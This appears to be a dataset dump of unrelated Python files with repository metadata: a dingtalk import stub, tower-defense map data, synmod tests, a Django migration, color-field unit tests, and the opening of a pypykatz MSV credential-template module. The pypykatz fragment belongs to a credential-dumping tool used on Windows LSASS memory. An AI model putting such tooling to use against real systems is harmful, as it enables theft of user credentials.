f3c88a2395ad8886f4dec358684468d9b24bb235 | 71 | py | Python | other/dingding/dingtalk/api/__init__.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | other/dingding/dingtalk/api/__init__.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | other/dingding/dingtalk/api/__init__.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | from dingtalk.api.rest import *
from dingtalk.api.base import FileItem
| 23.666667 | 38 | 0.816901 | 11 | 71 | 5.272727 | 0.636364 | 0.413793 | 0.517241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112676 | 71 | 2 | 39 | 35.5 | 0.920635 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
45f4ff0ebf88bd6baa930b21957a2a4776515857 | 1,700 | py | Python | examples/tower_defense/map_data.py | yuehaowang/pylash_engine | 338c1552ff55e1088534bc127cfc5aafbda61227 | [
"MIT"
] | 38 | 2015-09-12T15:09:51.000Z | 2021-08-12T10:49:28.000Z | examples/tower_defense/map_data.py | yuehaowang/pylash_engine | 338c1552ff55e1088534bc127cfc5aafbda61227 | [
"MIT"
] | 2 | 2021-03-12T07:03:14.000Z | 2021-11-17T11:29:23.000Z | examples/tower_defense/map_data.py | yuehaowang/pylash_engine | 338c1552ff55e1088534bc127cfc5aafbda61227 | [
"MIT"
] | 21 | 2016-03-15T02:18:37.000Z | 2021-03-02T06:41:16.000Z | mapImageList = [
[18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18],
[18, 18, 18, 18, 18, 19, 18, 18, 18, 18, 18, 18, 18, 18, 18],
[18, 18, 18, 18, 19, 19, 17, 17, 22, 23, 24, 17, 18, 18, 18],
[18, 18, 18, 19, 19, 17, 17, 17, 25, 26, 27, 17, 18, 18, 18],
[18, 18, 17, 17, 17, 17, 17, 17, 17, 16, 17, 17, 18, 18, 18],
[18, 17, 17, 17, 17, 17, 17, 17, 17, 16, 17, 17, 17, 18, 18],
[18, 16, 16, 16, 16, 17, 17, 17, 17, 16, 17, 17, 17, 17, 18],
[18, 16, 17, 17, 16, 16, 16, 17, 17, 16, 17, 17, 17, 17, 18],
[18, 16, 17, 17, 17, 17, 16, 17, 17, 16, 17, 17, 17, 17, 17],
[18, 16, 16, 16, 17, 17, 16, 16, 16, 16, 17, 17, 17, 17, 17],
[18, 17, 17, 16, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 18],
[18, 17, 17, 16, 16, 16, 16, 17, 17, 17, 17, 19, 19, 18, 18],
[18, 17, 17, 17, 17, 17, 16, 17, 17, 19, 19, 19, 18, 18, 18],
[18, 16, 16, 16, 16, 16, 16, 17, 17, 19, 19, 18, 18, 18, 18],
[18, 16, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18]
]
terrainList = [
[2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2],
[2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2],
[2, 2, 2, 2, 2, 2, 0, 0, 2, 2, 2, 0, 2, 2, 2],
[2, 2, 2, 2, 2, 0, 0, 0, 2, 2, 2, 0, 2, 2, 2],
[2, 2, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 2, 2, 2],
[2, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 2, 2],
[2, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 2],
[2, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 2],
[2, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[2, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0],
[2, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2],
[2, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 2, 2, 2, 2],
[2, 0, 0, 0, 0, 0, 1, 0, 0, 2, 2, 2, 2, 2, 2],
[2, 1, 1, 1, 1, 1, 1, 0, 0, 2, 2, 2, 2, 2, 2],
[2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2]
] | 48.571429 | 62 | 0.410588 | 452 | 1,700 | 1.544248 | 0.033186 | 0.246418 | 0.309456 | 0.34957 | 0.946991 | 0.941261 | 0.881089 | 0.805158 | 0.679083 | 0.636103 | 0 | 0.556931 | 0.287059 | 1,700 | 35 | 63 | 48.571429 | 0.018977 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
340184320b631c1172079e7f62c07f907c1fb2c6 | 6,094 | py | Python | tests/test_master.py | Craven-Biostat-Lab/synmod | 433e2f1726e68acbc45f226b1235f15508156de1 | [
"MIT"
] | 1 | 2020-05-21T14:56:14.000Z | 2020-05-21T14:56:14.000Z | tests/test_master.py | Craven-Biostat-Lab/synmod | 433e2f1726e68acbc45f226b1235f15508156de1 | [
"MIT"
] | 3 | 2020-10-20T08:17:07.000Z | 2021-09-08T02:34:51.000Z | tests/test_master.py | Craven-Biostat-Lab/synmod | 433e2f1726e68acbc45f226b1235f15508156de1 | [
"MIT"
] | 1 | 2021-12-14T21:16:53.000Z | 2021-12-14T21:16:53.000Z | """Tests for master script"""
import json
import subprocess
import sys
from unittest.mock import patch
import cloudpickle
import numpy as np
import synmod
from synmod import master, constants
from tests.utils import pre_test, post_test, round_fp
# pylint: disable = invalid-name, redefined-outer-name, protected-access
def test_regressor1(tmpdir, caplog):
"""Test synthetic data generation"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
cmd = ("python -m synmod -synthesis_type temporal -model_type regressor -num_instances 100 -num_features 10 -sequence_length 20 "
f"-fraction_relevant_features 0.5 -include_interaction_only_features 1 -output_dir {output_dir} -seed {constants.SEED}")
pass_args = cmd.split()[2:]
with patch.object(sys, 'argv', pass_args):
master.main()
post_test(caplog, output_dir)
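
# Sketch of a shared helper (not part of the original module): the tests below all
# patch sys.argv from a command string in the same way, which could be factored out
# like this and reused wherever master.main() is invoked in-process.
def _run_cli(cmd):
    pass_args = cmd.split()[2:]
    with patch.object(sys, 'argv', pass_args):
        return master.main()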
def test_subprocess1(tmpdir, caplog):
"""Test synthetic data generation"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
cmd = ("python -m synmod -synthesis_type temporal -model_type regressor -num_instances 100 -num_features 10 -sequence_length 20 "
f"-fraction_relevant_features 0.5 -include_interaction_only_features 1 -output_dir {output_dir} -seed {constants.SEED}")
subprocess.check_call(cmd, shell=True)
post_test(caplog, output_dir)
def test_classifier1(tmpdir, caplog):
"""Test synthetic data generation"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
cmd = ("python -m synmod -synthesis_type temporal -model_type classifier -num_instances 100 -num_features 10 -sequence_length 20 "
f"-fraction_relevant_features 0.5 -include_interaction_only_features 1 -output_dir {output_dir} -seed {constants.SEED}")
pass_args = cmd.split()[2:]
with patch.object(sys, 'argv', pass_args):
master.main()
post_test(caplog, output_dir)
def test_reproducible_classifier(tmpdir, data_regression, caplog):
"""Reproducibility of results regression test"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
cmd = ("python -m synmod -synthesis_type temporal -model_type classifier -num_instances 100 -num_features 10 -sequence_length 20 "
f"-fraction_relevant_features 0.8 -include_interaction_only_features 1 -output_dir {output_dir} -seed {constants.SEED}")
pass_args = cmd.split()[2:]
with patch.object(sys, 'argv', pass_args):
_, data, model = master.main()
post_test(caplog, output_dir)
labels = model.predict(data, labels=True)
data_regression.check(round_fp(data).tobytes() + labels.tobytes())
def test_reproducible_regressor(tmpdir, data_regression, caplog):
"""Reproducibility of results regression test"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
cmd = ("python -m synmod -synthesis_type temporal -model_type regressor -num_instances 100 -num_features 10 -sequence_length 20 "
f"-fraction_relevant_features 0.8 -include_interaction_only_features 1 -output_dir {output_dir} -seed {constants.SEED}")
pass_args = cmd.split()[2:]
with patch.object(sys, 'argv', pass_args):
_, data, model = master.main()
post_test(caplog, output_dir)
labels = model.predict(data)
data_regression.check(round_fp(data).tobytes() + round_fp(labels).tobytes())
def test_reproducible_write_outputs(tmpdir, data_regression, file_regression, caplog):
"""Regression test to test reproducible human-readable summary of config/model/features and output files"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
cmd = ("python -m synmod -synthesis_type temporal -model_type classifier -num_instances 100 -num_features 10 -sequence_length 20 "
f"-fraction_relevant_features 0.8 -include_interaction_only_features 1 -write_outputs 1 -output_dir {output_dir} -seed {constants.SEED}")
pass_args = cmd.split()[2:]
with patch.object(sys, 'argv', pass_args):
master.main()
data = np.load(f"{output_dir}/{constants.INSTANCES_FILENAME}")
post_test(caplog, output_dir)
with open(f"{output_dir}/{constants.SUMMARY_FILENAME}", "rb") as summary_file:
summary = json.load(summary_file)
file_regression.check(json.dumps(round_fp(summary), indent=2), extension=".json")
with open(f"{output_dir}/{constants.MODEL_FILENAME}", "rb") as model_file:
model = cloudpickle.load(model_file)
labels = model.predict(data, labels=True)
data_regression.check(round_fp(data).tobytes() + labels.tobytes())
def test_reproducible_standardize_features(tmpdir, data_regression, file_regression, caplog):
"""Regression test to test reproducibility with standardized features"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
cmd = ("python -m synmod -synthesis_type temporal -model_type classifier -num_instances 100 -num_features 10 -sequence_length 20 "
"-fraction_relevant_features 0.8 -include_interaction_only_features 1 -write_outputs 1 "
f"-standardize_features 1 -output_dir {output_dir} -seed {constants.SEED}")
pass_args = cmd.split()[2:]
with patch.object(sys, 'argv', pass_args):
master.main()
data = np.load(f"{output_dir}/{constants.INSTANCES_FILENAME}")
post_test(caplog, output_dir)
with open(f"{output_dir}/{constants.SUMMARY_FILENAME}", "rb") as summary_file:
summary = json.load(summary_file)
file_regression.check(json.dumps(round_fp(summary), indent=2), extension=".json")
with open(f"{output_dir}/{constants.MODEL_FILENAME}", "rb") as model_file:
model = cloudpickle.load(model_file)
labels = model.predict(data, labels=True)
data_regression.check(round_fp(data).tobytes() + labels.tobytes())
def test_interface(tmpdir, caplog):
"""Test API"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
_ = synmod.synthesize(output_dir=output_dir, num_features=2, num_instances=10, synthesis_type=constants.TEMPORAL, sequence_length=5)
| 52.534483 | 148 | 0.735478 | 834 | 6,094 | 5.111511 | 0.139089 | 0.078114 | 0.022519 | 0.030026 | 0.848464 | 0.840957 | 0.840957 | 0.82524 | 0.82524 | 0.82524 | 0 | 0.016959 | 0.148507 | 6,094 | 115 | 149 | 52.991304 | 0.804587 | 0.074171 | 0 | 0.724138 | 0 | 0.011494 | 0.357756 | 0.124017 | 0 | 0 | 0 | 0 | 0 | 1 | 0.091954 | false | 0.137931 | 0.103448 | 0 | 0.195402 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
3416c3bea52a9895349d55551775c3351c880109 | 11,515 | py | Python | rdmo/questions/migrations/0007_refactoring.py | Raspeanut/rdmo | 9f785010a499c372a2f8368ccf76d2ea4150adcb | [
"Apache-2.0"
] | 77 | 2016-08-09T11:40:20.000Z | 2022-03-06T11:03:26.000Z | rdmo/questions/migrations/0007_refactoring.py | Raspeanut/rdmo | 9f785010a499c372a2f8368ccf76d2ea4150adcb | [
"Apache-2.0"
] | 377 | 2016-07-01T13:59:36.000Z | 2022-03-30T13:53:19.000Z | rdmo/questions/migrations/0007_refactoring.py | Raspeanut/rdmo | 9f785010a499c372a2f8368ccf76d2ea4150adcb | [
"Apache-2.0"
] | 47 | 2016-06-23T11:32:19.000Z | 2022-03-01T11:34:37.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2017-01-26 16:01
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('questions', '0006_auto_20160803_1619'),
]
operations = [
migrations.AddField(
model_name='catalog',
name='comment',
field=models.TextField(blank=True, help_text='Additional information about this catalog.', null=True, verbose_name='Comment'),
),
migrations.AddField(
model_name='catalog',
name='key',
field=models.SlugField(blank=True, help_text='The internal identifier of this catalog. The URI will be generated from this key.', max_length=128, null=True, verbose_name='Key'),
),
migrations.AddField(
model_name='catalog',
name='uri',
field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this catalog (auto-generated).', max_length=640, null=True, verbose_name='URI'),
),
migrations.AddField(
model_name='catalog',
name='uri_prefix',
field=models.URLField(blank=True, help_text='The prefix for the URI of this catalog.', max_length=256, null=True, verbose_name='URI Prefix'),
),
migrations.AddField(
model_name='questionentity',
name='comment',
field=models.TextField(blank=True, help_text='Additional information about this question/questionset.', null=True, verbose_name='Comment'),
),
migrations.AddField(
model_name='questionentity',
name='key',
field=models.SlugField(blank=True, help_text='The internal identifier of this question/questionset. The URI will be generated from this key.', max_length=128, null=True, verbose_name='Key'),
),
migrations.AddField(
model_name='questionentity',
name='uri',
field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this question/questionset (auto-generated).', max_length=640, null=True, verbose_name='URI'),
),
migrations.AddField(
model_name='questionentity',
name='uri_prefix',
field=models.URLField(blank=True, help_text='The prefix for the URI of this question/questionset.', max_length=256, null=True, verbose_name='URI Prefix'),
),
migrations.AddField(
model_name='section',
name='comment',
field=models.TextField(blank=True, help_text='Additional information about this section.', null=True, verbose_name='Comment'),
),
migrations.AddField(
model_name='section',
name='key',
field=models.SlugField(blank=True, help_text='The internal identifier of this section. The URI will be generated from this key.', max_length=128, null=True, verbose_name='Key'),
),
migrations.AddField(
model_name='section',
name='uri',
field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this section (auto-generated).', max_length=640, null=True, verbose_name='URI'),
),
migrations.AddField(
model_name='section',
name='uri_prefix',
field=models.URLField(blank=True, help_text='The prefix for the URI of this section.', max_length=256, null=True, verbose_name='URI Prefix'),
),
migrations.AddField(
model_name='subsection',
name='comment',
field=models.TextField(blank=True, help_text='Additional information about this subsection.', null=True, verbose_name='Comment'),
),
migrations.AddField(
model_name='subsection',
name='key',
field=models.SlugField(blank=True, help_text='The internal identifier of this subsection. The URI will be generated from this key.', max_length=128, null=True, verbose_name='Key'),
),
migrations.AddField(
model_name='subsection',
name='uri',
field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this subsection (auto-generated).', max_length=640, null=True, verbose_name='URI'),
),
migrations.AddField(
model_name='subsection',
name='uri_prefix',
field=models.URLField(blank=True, help_text='The prefix for the URI of this subsection.', max_length=256, null=True, verbose_name='URI Prefix'),
),
migrations.AlterField(
model_name='catalog',
name='order',
field=models.IntegerField(default=0, help_text='The position of this catalog in lists.', verbose_name='Order'),
),
migrations.AlterField(
model_name='catalog',
name='title_de',
field=models.CharField(help_text='The German title for this catalog.', max_length=256, verbose_name='Title (de)'),
),
migrations.AlterField(
model_name='catalog',
name='title_en',
field=models.CharField(help_text='The English title for this catalog.', max_length=256, verbose_name='Title (en)'),
),
migrations.AlterField(
model_name='question',
name='parent',
field=models.ForeignKey(blank=True, help_text='The question set this question belongs to.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='questions', to='questions.QuestionEntity', verbose_name='Parent'),
),
migrations.AlterField(
model_name='question',
name='text_de',
field=models.TextField(help_text='The German text for this question.', verbose_name='Text (de)'),
),
migrations.AlterField(
model_name='question',
name='text_en',
field=models.TextField(help_text='The English text for this question.', verbose_name='Text (en)'),
),
migrations.AlterField(
model_name='question',
name='widget_type',
field=models.CharField(choices=[('text', 'Text'), ('textarea', 'Textarea'), ('yesno', 'Yes/No'), ('checkbox', 'Checkboxes'), ('radio', 'Radio buttons'), ('select', 'Select drop-down'), ('range', 'Range slider'), ('date', 'Date picker')], help_text='Type of widget for this question.', max_length=12, verbose_name='Widget type'),
),
migrations.AlterField(
model_name='questionentity',
name='attribute_entity',
field=models.ForeignKey(blank=True, help_text='The attribute/entity this question belongs to.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='domain.AttributeEntity', verbose_name='Attribute entity'),
),
migrations.AlterField(
model_name='questionentity',
name='help_de',
field=models.TextField(blank=True, help_text='The German help text for this question/questionset.', null=True, verbose_name='Help (de)'),
),
migrations.AlterField(
model_name='questionentity',
name='help_en',
field=models.TextField(blank=True, help_text='The English help text for this question/questionset.', null=True, verbose_name='Help (en)'),
),
migrations.AlterField(
model_name='questionentity',
name='label_de',
field=models.TextField(help_text='The German label for this question/questionset (auto-generated).', verbose_name='Label (de)'),
),
migrations.AlterField(
model_name='questionentity',
name='label_en',
field=models.TextField(help_text='The English label for this question/questionset (auto-generated).', verbose_name='Label (en)'),
),
migrations.AlterField(
model_name='questionentity',
name='order',
field=models.IntegerField(default=0, help_text='The position of this subsection in lists.', verbose_name='Order'),
),
migrations.AlterField(
model_name='questionentity',
name='subsection',
field=models.ForeignKey(help_text='The section this question belongs to.', on_delete=django.db.models.deletion.CASCADE, related_name='entities', to='questions.Subsection', verbose_name='Catalog'),
),
migrations.AlterField(
model_name='section',
name='catalog',
field=models.ForeignKey(help_text='The catalog this section belongs to.', on_delete=django.db.models.deletion.CASCADE, related_name='sections', to='questions.Catalog', verbose_name='Catalog'),
),
migrations.AlterField(
model_name='section',
name='label_de',
field=models.TextField(help_text='The German label for this section (auto-generated).', verbose_name='Label (de)'),
),
migrations.AlterField(
model_name='section',
name='label_en',
field=models.TextField(help_text='The English label for this section (auto-generated).', verbose_name='Label (en)'),
),
migrations.AlterField(
model_name='section',
name='order',
field=models.IntegerField(default=0, help_text='The position of this section in lists.', verbose_name='Order'),
),
migrations.AlterField(
model_name='section',
name='title_de',
field=models.CharField(help_text='The German title for this section.', max_length=256, verbose_name='Title (de)'),
),
migrations.AlterField(
model_name='section',
name='title_en',
field=models.CharField(help_text='The English title for this section.', max_length=256, verbose_name='Title (en)'),
),
migrations.AlterField(
model_name='subsection',
name='label_de',
field=models.TextField(help_text='The German label for this subsection (auto-generated).', verbose_name='Label (de)'),
),
migrations.AlterField(
model_name='subsection',
name='label_en',
field=models.TextField(help_text='The English label for this subsection (auto-generated).', verbose_name='Label (en)'),
),
migrations.AlterField(
model_name='subsection',
name='order',
field=models.IntegerField(default=0, help_text='The position of this subsection in lists.', verbose_name='Order'),
),
migrations.AlterField(
model_name='subsection',
name='section',
field=models.ForeignKey(help_text='The section this subsection belongs to.', on_delete=django.db.models.deletion.CASCADE, related_name='subsections', to='questions.Section', verbose_name='Catalog'),
),
migrations.AlterField(
model_name='subsection',
name='title_de',
field=models.CharField(help_text='The German title for this subsection.', max_length=256, verbose_name='Title (de)'),
),
migrations.AlterField(
model_name='subsection',
name='title_en',
field=models.CharField(help_text='The English title for this subsection.', max_length=256, verbose_name='Title (en)'),
),
]
| 50.726872 | 340 | 0.62475 | 1,276 | 11,515 | 5.492163 | 0.094828 | 0.050228 | 0.058076 | 0.107591 | 0.875285 | 0.866153 | 0.830908 | 0.74258 | 0.695919 | 0.627426 | 0 | 0.010548 | 0.250803 | 11,515 | 226 | 341 | 50.951327 | 0.801785 | 0.005645 | 0 | 0.730594 | 1 | 0 | 0.297283 | 0.0152 | 0.004566 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.013699 | 0 | 0.027397 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1b37fb4d04904cef091e66d1e7ce3047f30e0754 | 7,357 | py | Python | tests/unit/models/field/color.py | RaenonX/Jelly-Bot-API | c7da1e91783dce3a2b71b955b3a22b68db9056cf | [
"MIT"
] | 5 | 2020-08-26T20:12:00.000Z | 2020-12-11T16:39:22.000Z | tests/unit/models/field/color.py | RaenonX/Jelly-Bot | c7da1e91783dce3a2b71b955b3a22b68db9056cf | [
"MIT"
] | 234 | 2019-12-14T03:45:19.000Z | 2020-08-26T18:55:19.000Z | tests/unit/models/field/color.py | RaenonX/Jelly-Bot-API | c7da1e91783dce3a2b71b955b3a22b68db9056cf | [
"MIT"
] | 2 | 2019-10-23T15:21:15.000Z | 2020-05-22T09:35:55.000Z | from typing import Type, Any, Tuple
from extutils.color import Color, ColorFactory
from models.field import ColorField, BaseField
from models.field.exceptions import (
FieldTypeMismatchError, FieldNoneNotAllowedError, FieldValueInvalidError, FieldError
)
from ._test_val import TestFieldValue
from ._test_prop import TestFieldProperty
__all__ = ["TestColorFieldProperty", "TestColorFieldValueAllowNone",
"TestColorFieldValueDefault", "TestColorFieldValueNoAutoCast"]
class TestColorFieldProperty(TestFieldProperty.TestClass):
def get_field_class(self) -> Type[BaseField]:
return ColorField
def valid_not_none_obj_value(self) -> Any:
return ColorFactory.WHITE
def expected_none_object(self) -> Any:
return ColorFactory.DEFAULT
def get_valid_default_values(self) -> Tuple[Tuple[Any, Any], ...]:
return (
(ColorFactory.DEFAULT, ColorFactory.DEFAULT),
(5723991, Color(5723991)),
("#575757", Color(5723991)),
("575757", Color(5723991)),
(Color(5723991), Color(5723991))
)
def get_invalid_default_values(self) -> Tuple[Any, ...]:
return True, -8000, 20000000, "GGGGGG"
def get_expected_types(self) -> Tuple[Type[Any], ...]:
return Color, int, str
def get_desired_type(self) -> Type[Any]:
return Color
class TestColorFieldValueDefault(TestFieldValue.TestClass):
def get_field(self) -> BaseField:
return ColorField("k")
def get_value_type_match_test(self) -> Tuple[Tuple[Any, bool], ...]:
return (
(None, False),
(ColorFactory.DEFAULT, True),
(5723991, True),
("#575757", True),
("575757", True),
(Color(5723991), True),
(True, False),
(-8000, True),
(20000000, True),
("GGGGGG", True)
)
def get_value_validity_test(self) -> Tuple[Tuple[Any, bool], ...]:
return (
(None, False),
(ColorFactory.DEFAULT, True),
(5723991, True),
("#575757", True),
("575757", True),
(Color(5723991), True),
(True, False),
(-8000, False),
(20000000, False),
("GGGGGG", False)
)
def is_auto_cast(self) -> bool:
return True
def get_values_to_cast(self) -> Tuple[Tuple[Any, Any], ...]:
return (
(ColorFactory.DEFAULT, ColorFactory.DEFAULT),
(5723991, Color(5723991)),
("#575757", Color(5723991)),
("575757", Color(5723991)),
(Color(5723991), Color(5723991))
)
def get_valid_value_to_set(self) -> Tuple[Tuple[Any, Any], ...]:
return (
(ColorFactory.DEFAULT, ColorFactory.DEFAULT),
(5723991, Color(5723991)),
("#575757", Color(5723991)),
("575757", Color(5723991)),
(Color(5723991), Color(5723991))
)
def get_invalid_value_to_set(self) -> Tuple[Tuple[Any, Type[FieldError]], ...]:
return (
(None, FieldNoneNotAllowedError),
(True, FieldTypeMismatchError),
(-8000, FieldValueInvalidError),
(20000000, FieldValueInvalidError),
("GGGGGG", FieldValueInvalidError),
)
class TestColorFieldValueAllowNone(TestFieldValue.TestClass):
def get_field(self) -> BaseField:
return ColorField("k", allow_none=True)
def get_value_type_match_test(self) -> Tuple[Tuple[Any, bool], ...]:
return (
(None, True),
(ColorFactory.DEFAULT, True),
(5723991, True),
("#575757", True),
("575757", True),
(Color(5723991), True),
(True, False),
(-8000, True),
(20000000, True),
("GGGGGG", True)
)
def get_value_validity_test(self) -> Tuple[Tuple[Any, bool], ...]:
return (
(None, True),
(ColorFactory.DEFAULT, True),
(5723991, True),
("#575757", True),
("575757", True),
(Color(5723991), True),
(True, False),
(-8000, False),
(20000000, False),
("GGGGGG", False)
)
def is_auto_cast(self) -> bool:
return True
def get_values_to_cast(self) -> Tuple[Tuple[Any, Any], ...]:
return (
(None, None),
(ColorFactory.DEFAULT, ColorFactory.DEFAULT),
(5723991, Color(5723991)),
("#575757", Color(5723991)),
("575757", Color(5723991)),
(Color(5723991), Color(5723991))
)
def get_valid_value_to_set(self) -> Tuple[Tuple[Any, Any], ...]:
return (
(None, None),
(ColorFactory.DEFAULT, ColorFactory.DEFAULT),
(5723991, Color(5723991)),
("#575757", Color(5723991)),
("575757", Color(5723991)),
(Color(5723991), Color(5723991))
)
def get_invalid_value_to_set(self) -> Tuple[Tuple[Any, Type[FieldError]], ...]:
return (
(True, FieldTypeMismatchError),
(-8000, FieldValueInvalidError),
(20000000, FieldValueInvalidError),
("GGGGGG", FieldValueInvalidError),
)
class TestColorFieldValueNoAutoCast(TestFieldValue.TestClass):
def get_field(self) -> BaseField:
return ColorField("k", auto_cast=False)
def get_value_type_match_test(self) -> Tuple[Tuple[Any, bool], ...]:
return (
(None, False),
(ColorFactory.DEFAULT, True),
(5723991, True),
("#575757", True),
("575757", True),
(Color(5723991), True),
(True, False),
(-8000, True),
(20000000, True),
("GGGGGG", True)
)
def get_value_validity_test(self) -> Tuple[Tuple[Any, bool], ...]:
return (
(None, False),
(ColorFactory.DEFAULT, True),
(5723991, True),
("#575757", True),
("575757", True),
(Color(5723991), True),
(True, False),
(-8000, False),
(20000000, False),
("GGGGGG", False)
)
def is_auto_cast(self) -> bool:
return False
def get_values_to_cast(self) -> Tuple[Tuple[Any, Any], ...]:
return (
(ColorFactory.DEFAULT, ColorFactory.DEFAULT),
(5723991, Color(5723991)),
("#575757", Color(5723991)),
("575757", Color(5723991)),
(Color(5723991), Color(5723991))
)
def get_valid_value_to_set(self) -> Tuple[Tuple[Any, Any], ...]:
return (
(ColorFactory.DEFAULT, ColorFactory.DEFAULT),
(5723991, 5723991),
("#575757", "#575757"),
("575757", "575757"),
(Color(5723991), Color(5723991))
)
def get_invalid_value_to_set(self) -> Tuple[Tuple[Any, Type[FieldError]], ...]:
return (
(None, FieldNoneNotAllowedError),
(True, FieldTypeMismatchError),
(-8000, FieldValueInvalidError),
(20000000, FieldValueInvalidError),
("GGGGGG", FieldValueInvalidError),
)
| 31.575107 | 88 | 0.541253 | 643 | 7,357 | 6.051322 | 0.102644 | 0.117194 | 0.092778 | 0.069905 | 0.76587 | 0.764328 | 0.764328 | 0.764328 | 0.764328 | 0.733488 | 0 | 0.129958 | 0.318064 | 7,357 | 232 | 89 | 31.711207 | 0.645605 | 0 | 0 | 0.746193 | 0 | 0 | 0.047574 | 0.014272 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142132 | false | 0 | 0.030457 | 0.142132 | 0.335025 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 7 |
1b71c41b49693648dbe9613cc7d39e5c2be6f5e4 | 34,817 | py | Python | pypykatz/alsadecryptor/packages/msv/templates.py | wisdark/pypykatz | 7dccf2fa52532586da9b5ae3e849928b4ba5a3ba | [
"MIT"
] | 1,861 | 2018-05-26T11:16:39.000Z | 2022-03-24T19:48:55.000Z | pypykatz/alsadecryptor/packages/msv/templates.py | wisdark/pypykatz | 7dccf2fa52532586da9b5ae3e849928b4ba5a3ba | [
"MIT"
] | 77 | 2018-05-28T21:43:31.000Z | 2021-12-05T00:11:31.000Z | pypykatz/alsadecryptor/packages/msv/templates.py | wisdark/pypykatz | 7dccf2fa52532586da9b5ae3e849928b4ba5a3ba | [
"MIT"
] | 270 | 2018-05-26T16:42:14.000Z | 2022-03-24T03:05:08.000Z | #!/usr/bin/env python3
#
# Author:
# Tamas Jos (@skelsec)
#
import io
from pypykatz.commons.common import KatzSystemArchitecture, WindowsMinBuild, WindowsBuild
from pypykatz.alsadecryptor.win_datatypes import BOOLEAN, HANDLE, USHORT, ULONG, LSA_UNICODE_STRING, LSAISO_DATA_BLOB, \
BYTE, PVOID, WORD, DWORD, POINTER, LUID, PSID, ANSI_STRING
from pypykatz.alsadecryptor.package_commons import PackageTemplate
class MsvTemplate(PackageTemplate):
def __init__(self):
super().__init__('Msv')
self.signature = None
self.first_entry_offset = None
self.offset2 = None
self.list_entry = None
self.encrypted_credentials_list_struct = None
self.encrypted_credential_struct = None
self.decrypted_credential_struct = None
@staticmethod
def get_template(sysinfo):
template = MsvTemplate()
template.encrypted_credentials_list_struct = KIWI_MSV1_0_CREDENTIAL_LIST
template.log_template('encrypted_credentials_list_struct', template.encrypted_credentials_list_struct)
